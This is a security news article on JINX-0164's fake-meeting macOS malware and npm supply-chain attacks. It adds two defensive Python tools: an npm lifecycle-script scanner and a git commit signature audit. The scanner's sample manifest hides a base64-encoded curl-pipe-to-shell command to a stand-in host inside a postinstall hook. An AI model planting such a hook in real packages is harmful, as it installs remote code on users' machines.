A group of hackers, also known as JINX-0164, has been contacting crypto developers via LinkedIn and inviting them to fake meetings that lead to the infection of their machines with custom macOS malware.
The malware steals login credentials and hijacks the pipelines developers use to build and deploy software. Cloud security firm Wiz published its findings on May 27, 2026.
Fake meeting link drops AUDIOFIX malware on devs' machines
Wiz's incident response team linked the group to attacks going back to at least mid-2025.
Attackers reach out to a developer on LinkedIn using a profile that looks legitimate, suggest a business call, and send a link to a fake website made to look like Microsoft Teams or a similar video conferencing tool.
AUDIOFIX is the macOS malware that silently begins installing when a victim clicks on what they believe to be a meeting URL. It runs on Intel and Apple Silicon Macs and is delivered via a script hosted on a fake Apple site. The malware sets itself up to keep running after a restart, poses as a system audio component, and communicates with the attackers over HTTPS.
Once it is on the machine, it collects saved passwords from the macOS Keychain, browser credentials, SSH keys, cloud access tokens for AWS, GCP, and Azure, and crypto wallet data. Wiz also found that the attackers were directly phishing for passwords and storing them in encoded files.

JINX-0164 differs from other infostealers because it goes after internal code repositories and development infrastructure.
In a case study from early 2026, Wiz documented how the attackers used stolen GitHub tokens to extract secrets from CI/CD pipelines with an open-source tool called nord-stream. They then injected their AUDIOFIX malware into internal repositories, impersonating legitimate developers by forging Git commit metadata and pushing malicious code to main branches or hijacking existing ones.
Other developers who pulled and built from these poisoned repos were infected automatically. The team's own development workflow became the distribution mechanism. GitHub's Vigilant Mode, which flags commits lacking verified GPG signatures, caught the impersonation in at least one case.
The group also carried out a confirmed supply chain attack on a public npm package. On April 7, 2026, JINX-0164 trojanized version 4.9.1 of @velora-dex/sdk, injecting a base64-encoded command that fetched and executed a remote script deploying MINIRAT. That is a lightweight Go-based backdoor focused on persistence and remote command execution.
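A package trojanized this way usually carries its dropper in an npm lifecycle script (preinstall, postinstall, prepare), where a base64 blob hides the real command from a casual diff review. The scanner below is an added example, not code from Wiz or from the @velora-dex/sdk project; it reads a package.json, decodes any base64 blobs found in lifecycle hooks, and flags commands that reach the network or pipe text into a shell. The sample manifest is constructed for this example and is not the real 4.9.1 payload; its hidden command points at an `.invalid` domain so it can never resolve.

```python
import base64
import json
import re

# npm lifecycle hooks that run automatically during install or publish.
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall",
    "prepare", "prepublish", "prepublishOnly",
    "preuninstall", "uninstall", "postuninstall",
}

# A run of base64 alphabet long enough to be a payload rather than a short hash prefix.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicators that a command reaches the network or hands text to an interpreter.
SUSPICIOUS = re.compile(
    r"(curl|wget|https?://|\|\s*(sh|bash|zsh)\b|eval\(|child_process|\bnode\s+-e\b)",
    re.IGNORECASE,
)


def decode_blobs(command):
    """Return the decoded text of every base64 blob in a command string."""
    decoded = []
    for match in BASE64_BLOB.finditer(command):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all, or binary: skip it
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def scan_package_json(manifest_text):
    """Flag lifecycle scripts that look like hidden droppers.

    Returns a list of findings, each {"hook", "command", "decoded", "reason"}.
    """
    manifest = json.loads(manifest_text)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # build/test scripts do not run on a consumer's install
        reasons = []
        if SUSPICIOUS.search(command):
            reasons.append("network/exec indicator in script body")
        decoded = decode_blobs(command)
        if any(SUSPICIOUS.search(text) for text in decoded):
            reasons.append("base64 blob decodes to a network/exec command")
        if reasons:
            findings.append({"hook": hook, "command": command,
                             "decoded": decoded, "reason": reasons})
    return findings


# Constructed sample manifest (not the real @velora-dex/sdk file and not the
# payload Wiz analysed). The hidden command only targets an .invalid domain.
HIDDEN_COMMAND = "curl -s https://example.invalid/setup.sh | sh"
SAMPLE_MANIFEST = json.dumps({
    "name": "example-sdk",
    "version": "0.0.1",
    "scripts": {
        "build": "tsc -p .",
        "test": "jest --ci",
        "postinstall": "echo '%s' | base64 -d | sh"
                       % base64.b64encode(HIDDEN_COMMAND.encode()).decode(),
    },
})

if __name__ == "__main__":
    for finding in scan_package_json(SAMPLE_MANIFEST):
        print(f"[{finding['hook']}] {', '.join(finding['reason'])}")
        for text in finding["decoded"]:
            print("   decoded:", text)
```

Run it against the package.json of a freshly downloaded tarball before `npm install` executes the hooks; `npm pack` followed by extraction gives you the manifest without triggering them. The check is deliberately noisy on `curl`/`wget`, since a lifecycle script that fetches anything at install time deserves a human look regardless of encoding.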
Attackers target cash and code from crypto devs
AUDIOFIX and MINIRAT share command-and-control domains such as datahub[.]ink, cloud-sync[.]online, and byte-io[.]us. The attackers route their activity through Mullvad VPN, Astrill VPN, and ExpressVPN to hide their real location.
Wiz found some tactical similarities with the North Korean threat clusters UNC1069 and Sapphire Sleet, but no direct infrastructure overlap. They are calling JINX-0164 a distinct and financially motivated threat actor.
In May, hackers compromised 170+ npm and PyPI packages, including the official Mistral AI Python library. That attack exposed GitHub tokens and cloud credentials owned by crypto and AI developers. It was also the first documented case of malicious packages carrying valid SLSA Build Level 3 provenance attestations, breaking the cryptographic trust model meant to verify build integrity.
Hacking crypto and AI developers usually leads to cash and valuable code. Crypto labs and companies should strengthen their cybersecurity measures and review their CI/CD pipelines for any unauthorized access or malicious activity. Unauthorized GitHub actions, commits with unverified signatures, and unusual VPN connections are all warning signs. Developers who joined meetings sent via LinkedIn should scan their computers for malware.
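Both the repository case study above and the closing recommendation come down to the same check: a commit attributed to a trusted developer that lacks a verified signature is exactly what forged Git metadata looks like, and what Vigilant Mode caught. The audit below is an added example, not Wiz's tooling or GitHub's; it parses the output of `git log --format='%H%x09%G?%x09%an%x09%ae%x09%s'` (the `%G?` placeholder is git's own signature-status code) and reports every commit that is either unsigned, unverifiable, or authored by an address outside a trusted list. The log lines and the trusted-author list are constructed for this example and are not from the report.

```python
from dataclasses import dataclass

# Meaning of git's %G? signature-status codes, per `git help log`.
SIGNATURE_STATUS = {
    "G": "good signature",
    "B": "bad signature",
    "U": "good signature with unknown validity",
    "X": "good signature that has expired",
    "Y": "good signature made by an expired key",
    "R": "good signature made by a revoked key",
    "E": "signature cannot be checked (missing key)",
    "N": "no signature",
}

# Format string to produce the tab-separated input this audit expects.
GIT_LOG_FORMAT = "%H%x09%G?%x09%an%x09%ae%x09%s"

FIELDS = ("commit", "status", "author_name", "author_email", "subject")


@dataclass
class Finding:
    commit: str
    author_email: str
    status: str
    reason: str


def parse_log(log_text):
    """Split tab-separated `git log` lines into dicts; blank lines are ignored."""
    commits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t", len(FIELDS) - 1)
        if len(parts) != len(FIELDS):
            raise ValueError(f"unexpected git log line: {line!r}")
        commits.append(dict(zip(FIELDS, parts)))
    return commits


def audit_commits(log_text, trusted_emails):
    """Return a Finding for every commit that is not a good signature by a trusted author.

    Only status "G" passes: anything else (unsigned, unknown key, expired, revoked)
    means the author line cannot be relied on, which is the forged-metadata case.
    """
    findings = []
    for c in parse_log(log_text):
        trusted = c["author_email"] in trusted_emails
        if trusted and c["status"] == "G":
            continue
        if not trusted:
            reason = f"author {c['author_email']} is not in the trusted list"
        else:
            label = SIGNATURE_STATUS.get(c["status"], "unknown status code")
            reason = f"attributed to a trusted author but {label}"
        findings.append(Finding(c["commit"], c["author_email"], c["status"], reason))
    return findings


# Constructed sample: fake 40-hex hashes and example.com addresses, not data from Wiz.
# Each line is what GIT_LOG_FORMAT would print for one commit.
SAMPLE_LOG = "\n".join([
    "0000000000000000000000000000000000000001\tG\tAlice Dev\talice@example.com\tFix token refresh",
    "0000000000000000000000000000000000000002\tN\tAlice Dev\talice@example.com\tUpdate build step",
    "0000000000000000000000000000000000000003\tE\tBob Ops\tbob@example.com\tBump dependencies",
    "0000000000000000000000000000000000000004\tN\tCarol\tcarol@external.invalid\tAdd audio helper",
])

# Assumed allowlist of addresses whose commits are expected on protected branches.
TRUSTED_EMAILS = {"alice@example.com", "bob@example.com"}

if __name__ == "__main__":
    for f in audit_commits(SAMPLE_LOG, TRUSTED_EMAILS):
        print(f"{f.commit[:12]} {f.status} {f.author_email}: {f.reason}")
```

Run it over the range that landed since your last review, for example `git log --format="$GIT_LOG_FORMAT" origin/main@{1}..origin/main`, and treat any finding on a protected branch as an incident rather than a hygiene issue: in the case Wiz described, the commit that looked like a colleague's was the delivery vehicle.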
